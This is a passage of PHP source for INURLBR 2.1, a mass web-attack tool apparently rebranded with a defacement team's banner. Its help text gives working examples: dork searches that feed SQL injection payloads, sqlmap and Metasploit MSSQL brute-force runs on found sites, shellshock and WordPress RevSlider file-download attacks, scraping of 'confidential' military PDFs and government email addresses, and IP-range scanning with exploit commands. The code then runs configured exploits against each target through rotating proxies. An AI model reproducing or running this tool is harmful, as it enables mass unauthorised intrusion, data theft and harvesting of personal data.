  908. {$_SESSION["c1"]}--exploit-all-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
  909. (all) is run for each target found by the engine.
  910. Example: {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
  911. Usage: {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}1,2,8,22
  912.  
  913. {$_SESSION["c1"]}--exploit-vul-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
  914. (vull) run command only if the target was considered vulnerable.
  915. Example: {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
  916. Usage: {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}1,2,8,22
  917.  
  918. {$_SESSION["c1"]}--exploit-list{$_SESSION["c0"]} List all entries command in exploits.conf file.
  919.  
  920.  
  921. [!] Running subprocesses:
  922.  
  923. {$_SESSION["c1"]}--sub-file{$_SESSION["c0"]} Subprocess performs an injection
  924. strings in URLs found by the engine, via GET or POST.
  925. Example: {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}{youfile}{$_SESSION["c0"]}
  926. Usage: {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}exploits_get.txt
  927.  
  928. {$_SESSION["c1"]}--sub-get{$_SESSION["c0"]} defines whether the strings coming from
  929. --sub-file will be injected via GET.
  930. Usage: {$_SESSION["c1"]}--sub-get
  931.  
  932. {$_SESSION["c1"]}--sub-post{$_SESSION["c0"]} defines whether the strings coming from
  933. --sub-file will be injected via POST.
  934. Usage: {$_SESSION["c1"]}--sub-get
  935.  
  936. {$_SESSION["c1"]}--sub-concat{$_SESSION["c0"]} Sets string to be concatenated with
  937. the target host within the subprocess
  938. Example: {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
  939. Usage: {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}'/login.php'{$_SESSION["c0"]}
  940.  
  941. {$_SESSION["c1"]}--sub-cmd-vul{$_SESSION["c0"]} Each vulnerable URL found within the sub-process
  942. will execute the parameters of this command.
  943. Example: {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  944. Usage: {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  945. {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  946. {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  947.  
  948. {$_SESSION["c1"]}--sub-cmd-all{$_SESSION["c0"]} Run command to each target found within the sub-process scope.
  949. Example: {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  950. Usage: {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  951. {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  952. {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  953.  
  954.  
  955. {$_SESSION["c1"]}--port-scan{$_SESSION["c0"]} Defines ports that will be validated as open.
  956. Example: {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}{ports}{$_SESSION["c0"]}
  957. Usage: {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}'22,21,23,3306'{$_SESSION["c0"]}
  958.  
  959. {$_SESSION["c1"]}--port-cmd{$_SESSION["c0"]} Define command that runs when finding an open door.
  960. Example: {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  961. Usage: {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_:_PORT_'{$_SESSION["c0"]}
  962. {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_/file.php?sqli=1'{$_SESSION["c0"]}
  963.  
  964. {$_SESSION["c1"]}--port-write{$_SESSION["c0"]} Send values for door.
  965. Example: {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}{'value0','value1','value3'}{$_SESSION["c0"]}
  966. Usage: {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}\"'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'\"{$_SESSION["c0"]}
  967.  
  968.  
  969.  
  970. [!] Modifying values used within script parameters:
  971.  
  972. {$_SESSION["c1"]}md5{$_SESSION["c0"]} Encrypt values in md5.
  973. Example: {$_SESSION["c1"]}md5({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
  974. Usage: {$_SESSION["c1"]}md5({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
  975. Usage: {$_SESSION["c1"]}--exploit-get 'user?id=md5({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
  976.  
  977. {$_SESSION["c1"]}base64{$_SESSION["c0"]} Encrypt values in base64.
  978. Example: {$_SESSION["c1"]}base64({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
  979. Usage: {$_SESSION["c1"]}base64({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
  980. Usage: {$_SESSION["c1"]}--exploit-get 'user?id=base64({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
  981.  
  982. {$_SESSION["c1"]}hex{$_SESSION["c0"]} Encrypt values in hex.
  983. Example: {$_SESSION["c1"]}hex({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
  984. Usage: {$_SESSION["c1"]}hex({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
  985. Usage: {$_SESSION["c1"]}--exploit-get 'user?id=hex({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
  986.  
  987. {$_SESSION["c1"]}hex{$_SESSION["c0"]} Generate random values.
  988. Example: {$_SESSION["c1"]}random({$_SESSION["c2"]}{character_counter}{$_SESSION["c1"]}){$_SESSION["c0"]}
  989. Usage: {$_SESSION["c1"]}random({$_SESSION["c2"]}8{$_SESSION["c1"]}){$_SESSION["c0"]}
  990. Usage: {$_SESSION["c1"]}--exploit-get 'user?id=random({$_SESSION["c2"]}8{$_SESSION["c1"]})'{$_SESSION["c0"]}
  991.  
  992. ");
  993. }
  994.  
  995. function __info() {
  996.  
  997. return system("command clear") . __getOut("
  998. {$_SESSION["c1"]}_____ _ _ ______ ____
  999. |_ _| \ | | ____/ __ \
  1000. | | | \| | |__ | | | |
  1001. | | | . ` | __|| | | |
  1002. _| |_| |\ | | | |__| |
  1003. |_____|_| \_|_| \____/
  1004.  
  1005. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current PHP version=>{$_SESSION["c1"]}[ " . phpversion() . "{$_SESSION["c0"]} ]
  1006. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current script owner=>{$_SESSION["c1"]}[ " . get_current_user() . "{$_SESSION["c0"]} ]
  1007. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current uname=>{$_SESSION["c1"]}[ " . php_uname() . "{$_SESSION["c0"]} ]
  1008. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current pwd=>{$_SESSION["c1"]}[ " . getcwd() . "{$_SESSION["c0"]} ]
  1009. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1010.  
  1011. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}GRUPO INURL BRASIL - PESQUISA AVANÇADA.
  1012. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}SCRIPT NAME: INURLBR 2.1
  1013. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}AUTOR: Cleiton Pinheiro
  1014. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Nick: Googleinurl
  1015. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Email: inurlbr@gmail.com
  1016. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Blog: http://blog.inurl.com.br
  1017. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Twitter: https://twitter.com/googleinurl
  1018. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Facebook: https://fb.com/InurlBrasil
  1019. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}GIT: https://github.com/googleinurl
  1020. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Pastebin https://pastebin.com/u/Googleinurl
  1021. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}PSS: https://packetstormsecurity.com/user/googleinurl
  1022. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}YOUTUBE: http://youtube.com/c/INURLBrasil
  1023. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}PLUS: http://google.com/+INURLBrasil
  1024. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Version: 2.1
  1025.  
  1026. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1027.  
  1028. {$_SESSION["c1"]}[+]{$_SESSION["c16"]}NECESSARY FOR THE PROPER FUNCTIONING OF THE SCRIPT{$_SESSION["c0"]}
  1029.  
  1030. {$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} LIB & CONFIG{$_SESSION["c0"]}
  1031.  
  1032. * PHP Version 5.4.7
  1033. * php5-curl LIB
  1034. * php5-cli LIB
  1035. * cURL support enabled
  1036. * cURL Information 7.24.0
  1037. * allow_url_fopen On
  1038. * permission Reading & Writing
  1039. * User root privilege, or is in the sudoers group
  1040. * Operating system LINUX
  1041. * Proxy random TOR
  1042.  
  1043. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1044.  
  1045. {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}PERMISSION EXECUTION: chmod +x inurlbr.php{$_SESSION["c0"]}
  1046. {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CURL: sudo apt-get install php5-curl{$_SESSION["c0"]}
  1047. {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CLI: sudo apt-get install php5-cli{$_SESSION["c0"]}
  1048. {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033[0m
  1049. {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en{$_SESSION["c0"]}
  1050.  
  1051. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1052.  
  1053. {$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} COMMANDS SIMPLE SCRIPT{$_SESSION["c0"]}
  1054.  
  1055.  
  1056. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
  1057.  
  1058. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:aspx?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
  1059.  
  1060. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
  1061.  
  1062. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'index of wp-content/uploads' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6,2,4 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'Index of /wp-content/uploads'{$_SESSION["c0"]}
  1063.  
  1064. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(confidencial) ext:pdf' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 -t 2 --exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'confidencial'{$_SESSION["c0"]}
  1065.  
  1066. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(secreto) ext:pdf' {$_SESSION["c1"]}-s save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'secreto'{$_SESSION["c0"]}
  1067.  
  1068. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\"{$_SESSION["c0"]}
  1069.  
  1070. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'.new.php?new id' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6,7,2,3 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'::EXPLOIT-SUCESS::'{$_SESSION["c0"]}
  1071.  
  1072. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'new.php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}teste.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27 {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
  1073.  
  1074. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:pt inurl:aspx (id|q)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}bruteforce.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27 {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'msfcli auxiliary/scanner/mssql/mssql_login RHOST={$_SESSION["c9"]}_TARGETIP_ {$_SESSION["c2"]}MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'{$_SESSION["c0"]}
  1075.  
  1076. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:id & inurl:php' {$_SESSION["c1"]}-s {$_SESSION["c2"]}get.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'python ../sqlmap/sqlmap.py -u \"{$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c2"]}\" --dbs'{$_SESSION["c0"]}
  1077.  
  1078. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:index.php?id=' {$_SESSION["c1"]}-q 1,2,10 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"'?´0x27'\" {$_SESSION["c1"]}-s {$_SESSION["c2"]}report.txt {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap -Pn -p 1-8080 --script http-enum --open {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
  1079.  
  1080. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email' {$_SESSION["c1"]}-s {$_SESSION["c2"]}reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
  1081.  
  1082. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}emails.txt {$_SESSION["c1"]}-m{$_SESSION["c0"]}
  1083.  
  1084. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}urls.txt {$_SESSION["c1"]}-u{$_SESSION["c0"]}
  1085.  
  1086. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:gov.bo' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
  1087.  
  1088. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.uk' {$_SESSION["c1"]}-s {$_SESSION["c2"]}uk.txt {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]} 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' {$_SESSION["c0"]}
  1089.  
  1090. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
  1091.  
  1092. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}sqli.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil' {$_SESSION["c0"]}
  1093.  
  1094. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:\"cgi-bin/login.cgi\"' {$_SESSION["c1"]}-s {$_SESSION["c2"]}cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' {$_SESSION["c0"]}
  1095.  
  1096. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]}
  1097.  
  1098. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
  1099.  
  1100. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?pass=1234\" {$_SESSION["c1"]}-a {$_SESSION["c2"]}'<title>hello! admin</title>'{$_SESSION["c0"]}
  1101.  
  1102. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find_valid_cod-200.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}5{$_SESSION["c0"]}
  1103.  
  1104. ./inurlbr.php {$_SESSION["c1"]}--range {$_SESSION["c2"]}'200.20.10.1,200.20.10.255' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_' {$_SESSION["c0"]}
  1105.  
  1106. ./inurlbr.php {$_SESSION["c1"]}--range-rad {$_SESSION["c2"]}'1500' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_' {$_SESSION["c0"]}
  1107.  
  1108. ./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]}
  1109.  
  1110. ./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]} --pr
  1111.  
  1112. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksCGI.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]} --pr --shellshock
  1113.  
  1114. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks_Wordpress_revslider.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}'xpls_Arbitrary_File_Download.txt' {$_SESSION["c0"]}
  1115. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1116.  
  1117. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}It it also useful to know the full path to the PHP binary on your computer. {$_SESSION["c0"]}
  1118. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}There are several ways of finding out. For Ubuntu and Mac OS X the path is '/usr/bin/php'.{$_SESSION["c0"]}
  1119.  
  1120. googleinurl@inurlbr:~$ which php
  1121. /usr/bin/php
  1122. googleinurl@inurlbr:~/cli$ whereis php
  1123. php: /usr/bin/php /usr/share/php /usr/share/man/man1/php.1.gz
  1124. googleinurl@inurlbr:~/cli$ type -a php
  1125. php is /usr/bin/php
  1126.  
  1127. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1128.  
  1129.  
  1130. ");
  1131. }
  1132.  
  1133. ################################################################################
  1134. #BANNER HOME####################################################################
  1135.  
  1136. function __bannerLogo() {
  1137.  
  1138. $vis = ($_SESSION["os"] != 1) ? ("\033[1;3" . rand(1, 10) . "m") : NULL;
  1139.  
  1140. return (!is_null($_SESSION['config']['no-banner']) ? NULL : system("command clear") . "
  1141. {$vis}ELLVIN{$_SESSION["c12"]}1337@gmail.com
  1142. {$vis}ROOT@{$_SESSION["c1"]}MALAIKAT GALAU
  1143. {$_SESSION["c1"]}__[ ! ] Neither war between hackers, nor peace for the system.
  1144. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://www.defacer-tersakiti-team.org
  1145. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}https://www.facebook.com/kevinputrawalisongo
  1146. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current PHP version::[ {$_SESSION["c1"]}" . phpversion() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1147. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current script owner::[ {$_SESSION["c1"]}" . get_current_user() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1148. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current uname::[ {$_SESSION["c1"]}" . php_uname() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1149. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current pwd::[ {$_SESSION["c1"]}" . getcwd() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1150. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c2"]}Help: php galau.php --help{$_SESSION["c0"]}
  1151. {$_SESSION["c1"]}------------------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}
  1152. ");
  1153. }
  1154.  
  1155. ################################################################################
  1156. #CHANGE PROXY FUNCTION IN TIME##################################################
  1157. ################################################################################
  1158.  
  1159. function __timeValueChangeProxy($sec = NULL) {
  1160.  
  1161. return not_isnull_empty($sec) ? date('Y-m-d H:i:s', strtotime(date('Y-m-d H:i:s') . " + {$sec} second")) : NULL;
  1162. }
  1163.  
  1164. function __timeSecChangeProxy($list_proxy) {
  1165.  
  1166. if ($_SESSION["config"]["time_change_proxy"] < date('Y-m-d H:i:s') && !is_null($list_proxy)) {
  1167. $proxy = $list_proxy[rand(0, count($list_proxy) - 1)];
  1168. echo ("[ INFO ][PROXY] CHANGE: {$proxy} - " . date('Y-m-d H:i:s') . "\n");
  1169. $_SESSION["config"]["proxy"] = $proxy;
  1170. $_SESSION["config"]["time_change_proxy"] = __timeValueChangeProxy($_SESSION["config"]["time-proxy"]);
  1171. __plus();
  1172. }
  1173. }
  1174.  
  1175. ################################################################################
  1176. #GET STATUS HTTP URL############################################################
  1177. ################################################################################
  1178.  
  1179. function __getStatusURL($url) {
  1180.  
  1181. if (!is_null($url) && !empty($url)) {
  1182. return FALSE;
  1183. }
  1184. __plus();
  1185. $status = array();
  1186. $curl = curl_init($url);
  1187. curl_setopt($curl, CURLOPT_URL, $url);
  1188. $resultadoCurl = curl_exec($curl);
  1189. if ($resultadoCurl) {
  1190. preg_match_all('(HTTP.*)', $resultadoCurl, $status['http']) . __plus();
  1191.  
  1192. return (!is_null($status['http']) && !empty($status['http'])) ? TRUE : FALSE;
  1193. }
  1194. unset($curl);
  1195. return FALSE;
  1196. }
  1197.  
  1198. ################################################################################
  1199. #BEEP ##########################################################################
  1200. ################################################################################
  1201.  
  1202. function __cli_beep() {
  1203.  
  1204. echo ($_SESSION['config']['beep']) ? "\x07" : NULL;
  1205. }
  1206.  
  1207. ################################################################################
  1208. #SETUP TO RUN COMMANDS IN ID####################################################
  1209. ################################################################################
  1210.  
  1211. function __configExploitsExec($id, $alvo) {
  1212.  
  1213. $resultadoURL = __configExploitsList();
  1214. $final = array();
  1215. $id_ = ((strstr($id, ','))) ? explode(',', $id) : array($id); // MULTIPLAS ID'S EXPLOITS
  1216.  
  1217. foreach ($resultadoURL as $key) {
  1218. $__key = strstr($key, '::') ? explode("\n", $key) : NULL;
  1219. $final = is_array($__key) ? array_merge($final, $__key) : $final;
  1220. }
  1221. foreach ($id_ as $value) {
  1222. $final__ = isset($value) && !empty($value) ? explode('::', $final[$value]) : NULL;
  1223. $barra = "{$_SESSION["c1"]}[ INFO ]|___{$_SESSION["c0"]}\n";
  1224. $barra.= " {$_SESSION["c1"]}|";
  1225. print !is_null($final__) ? "\n{$barra}[ EXPLOIT ]:: {$final__[0]} /[ ID ]:: {$value} /[ COMMAND ]:: " . $final__[1] : NULL;
  1226. echo "\n ------------------------------------------------------------------------------------------------------------------";
  1227. print !is_null($final__) ? __command($final__[1], $alvo) : NULL;
  1228. __plus();
  1229. }
  1230. }
  1231.  
  1232. ################################################################################
  1233. #LIST COMMANDS FILE exploits.conf###############################################
  1234. ################################################################################
  1235.  
  1236. function __configExploitsList($op = NULL) {
  1237.  
  1238. $resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($_SESSION['config']['file_exploit_conf']))));
  1239.  
  1240. if (!is_null($op)) {
  1241. echo __bannerlogo();
  1242. echo $_SESSION["c11"];
  1243. echo "[*]__\n";
  1244. echo " |MENU EXPLOITS:";
  1245. echo "\n |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
